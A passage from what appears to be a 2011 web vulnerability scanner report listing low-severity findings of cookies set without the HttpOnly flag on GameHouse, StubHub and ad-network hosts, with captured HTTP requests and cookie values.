The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660; cp_session=A3lTJwZyACQHbwR0AhdSNlQTUmhSQVVuUS0JOgUlVS8MfgFtBSMCOwYlU1kAKAh9U2QGJ1NzVT0FbgU5UFkBelYcAGsGSgchAwkASgM%2BDEgDWFNQBk8AaQcHBDsCaFJlVDFSd1I6VTxRdQks; __qca=P0-962211929-1311107164228; cpath=site; __utma=30093501.1002048789.1311107164.1311107164.1311107164.1; __utmb=30093501.2.10.1311107164; __utmc=30093501; __utmz=30093501.1311107164.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_vnum%3D1468787164284%2526vn%253D1%7C1468787164284%3B%20s_lastvisit%3D1311107164287%7C1405715164287%3B%20s_nr%3D1311107207014%7C1468787207014%3B%20s_invisit%3Dtrue%7C1311109007016%3B; s_sess=%20s_dslv%3DFirst%2520page%2520view%2520or%2520cookies%2520not%2520supported%3B%20s_cc%3Dtrue%3B%20s_v1%3Dsite%3B%20s_sq%3Drealgamehousedev%253D%252526pid%25253DSupport%2525253A%25252520Home%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//support.gamehouse.com/app/answers/list/c/188%2525252C624/catname/Game%2525252520issues/session/L3NpZC9GZUNoRm%252526ot%25253DA%3B

Response

14.15. http://support.gamehouse.com/app/contact previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://support.gamehouse.com
Path:	/app/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cp_session=BH5TJw15BCAEbAR0AhcJbVcQATsHFFVuA38PPAQkUykMfgRoV3EFPAQnV10CKlYjBjFTcgAgCGAGbVVpVl9SKVEbCWJRHQYgDQcIQldqUhYEX1NQDUQEbQQEBDsCaAk%2BVzIBJAdvVTwDJw8q; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/contact HTTP/1.1
Host: support.gamehouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=AXtXIwN3ACQEbAd3UkcBZQdAAzkGFV1mVysOPVZ2UigCcFY6BiBRaA4tUlhWflMmW2wAIVV1CWFSOQM%2FVVwAewFLAGtQHAQiVlxTGVFsAkYBWldUA0oAaQQEBzhSOAE2B2IDJgZuXTRXcw4r; NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660

Response

14.16. http://t.mookie1.com/t/v1/event previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/event

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session=1311100565|1311100565; path=/; domain=.mookie1.com
id=2814750682866683; path=/; expires=Sun, 12-Aug-12 18:36:05 GMT; domain=.mookie1.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.17. http://www.gamehouse.com/images/subsidiary.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gamehouse.com
Path:	/images/subsidiary.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=A68BAE3959CA123F9A7FB421FB8A1170.gh-storefront-app03; Path=/
referrer=aHR0cDovL3N1cHBvcnQuZ2FtZWhvdXNlLmNvbS8=

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.18. http://www.stubhub.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.stubhub.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
TLTHID=7AEE7DDAB23610B20167D97254A5AD39; Path=/; Domain=.stubhub.com
STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; Domain=.stubhub.com; Expires=Thu, 11-Jul-2041 18:39:48 GMT; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.19. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

evo5_ii=6twZuywAYrkZnj3PjCGa8UGSBEUzkooZqU43f%2FGiyI1UXu7W6xg6VD2D0wBlPdOTT5OQE4U8evN3fFU06w2erg%3D%3D; expires=Wed, 18-Jan-2012 20:42:55 GMT; path=/
evo5_display=Lb7I6%2B93hnCmP8Ly1Y8aIz6mDQ1J3sznCNFCT7eof5ElbvVxhEDm93raeYwzidf%2FQorvxtKsBHYJrrYeSIbRYA%3D%3D; expires=Thu, 23-Jun-44591 20:42:55 GMT; path=/; domain=.netmng.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest= HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

14.20. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aNnWgZbyg6ANFA7ubQBktbP4HyZd0X4cZcAAm53CYYYBOwVf7ZaYNS5GABWtTBPqnpscefljZcokfbviSJkNC0FL96ZaCniYYS5SnbXZcYFwZd56hLo1qjFtIBYNq9ZaGFfQjB0C4uFKV7RRQZa3O3qjygF42ZaMEJ4b32BDDZdVMg6sF1IBYw2v0Kk1oO6ZdETRitDNXBoTGFOnxg6Q62emyb9ysdZdOpagBZdlUBA6RKMgwHPMt1ofr38xf9UMXVrqeZdWOePb28Rqb4pGvWd7; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:42:54 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.21. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!$=(bh!!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Thu, 18-Jul-2013 14:28:36 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=991772&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)